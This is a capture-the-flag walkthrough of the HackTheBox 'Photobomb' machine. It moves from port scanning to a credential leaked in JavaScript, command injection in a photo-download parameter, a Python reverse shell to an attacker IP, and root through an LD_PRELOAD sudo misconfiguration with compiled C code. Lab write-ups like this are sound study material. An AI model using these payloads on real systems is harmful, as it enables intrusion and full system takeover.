Scanning

> TARGET=10.129.54.168 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://photobomb.htb/
  • Add domain photobomb.htb

Web Enum

  • Browse the website and found a javascript file photobomb.js with the credential pH0t0:b0Mb!
function init() {
  // Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me
  if (document.cookie.match(/^(.*;)?\s*isPhotoBombTechSupport\s*=\s*[^;]+(.*)?$/)) {
    document.getElementsByClassName('creds')[0].setAttribute('href','http://pH0t0:b0Mb!@photobomb.htb/printer');
  }
}
window.onload = init;
  • Browse to http://photobomb.htb/printer/welcome and login with the above credential
  • In the response, see a locally referenced png file
<img src='http://127.0.0.1:4567/__sinatra__/404.png'>
  • Browsing the page ``http://photobomb.htb/printer/welcome` reveals that the backend might support python
  • Some more browsing found http://photobomb.htb/printer with a post form where you can choose to download photos

Foothold

  • Run burpsuite and try to download a large photo. Note: for some reason, POST requests will disappear from burp once it’s completed. Therefore, select a large photo to see the POST request in the history and send it to the repeater.
  • Tampering with the parameters for the POST request and find that the filetype parameter might be injectable
# Req
photo=nathaniel-worrell-zK_az6W3xIo-unsplash.jpg&filetype=png;id&dimensions=3000x2000

# Rsp
HTTP/1.1 500 Internal Server Error
Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 09 Oct 2022 07:35:24 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 71
Connection: close
Content-Disposition: attachment; filename=nathaniel-worrell-zK_az6W3xIo-unsplash_3000x2000.png;id
X-Xss-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN

Failed to generate a copy of nathaniel-worrell-zK_az6W3xIo-unsplash.jpg
  • Prepare a python reverse shell and url encode it
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<ip.",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  • Receive a revere shell as wizard and fetch the user flag

PE

  • Check the sudo rights
wizard@photobomb:~$ sudo -l

Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh
  • LD_PRELOAD can be invoked with sudo, let’s create a simple PE shell to exploit this
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/usr/bin/bash");
}
  • Compile and upload to the target
> gcc -fPIC -shared -o shell.so shell.c -nostartfiles
  • Trigger the shell to get root flag
> sudo LD_PRELOAD=/home/wizard/shell.so /opt/cleanup.sh